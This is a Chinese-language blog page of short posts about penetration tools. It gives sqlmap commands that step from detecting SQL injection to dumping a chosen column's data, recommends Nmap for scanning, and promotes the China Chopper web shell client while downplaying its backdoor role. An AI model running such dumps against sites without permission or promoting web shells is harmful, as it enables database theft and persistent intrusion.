渗透神器

Sqlmap检测SQL注入攻击

[不指定 2017/12/01 13:21 | by admin ]
测试SQL注入:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs
自动探测数据库类型和漏洞,如果成功会列出数据库:
点击在新窗口中浏览此图片

获得某个数据库中的表:
# sqlmap -u sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables

获得表的字段:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables -T some_table --columns

下载某一字段的数据:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables -T some_table --columns -C some_col --dump

这款工具也很好用,用来检测SQL漏洞注入比较精确,国内也有好几个SQL注入工具,博主以前也写过注入攻击工具哈;
神器下载地址这里就不提供了,自己搜索吧,反正也没多少人评论留意观看哈。

Nmap 进行 Web 漏洞扫描

[不指定 2017/12/01 12:00 | by admin ]
点击在新窗口中浏览此图片
很久没上博客,再提供款工具吧,亲测很好用,可以扫描端口及其它漏洞,比喻UDP/TCP端口;
点击:官网下载

中国菜刀

[不指定 2017/12/01 11:49 | by admin ]
点击在新窗口中浏览此图片
功夫最高也怕菜刀哈,很久没上博客了,分享前几年的渗透工具吧;一句话后门原先为网站管理用,因方便管理,故此给黑客作利用,而它本身非木马;
点击:官方下载
分页: 1/1 第一页 1 最后页 [ 显示模式: 摘要 | 列表 ]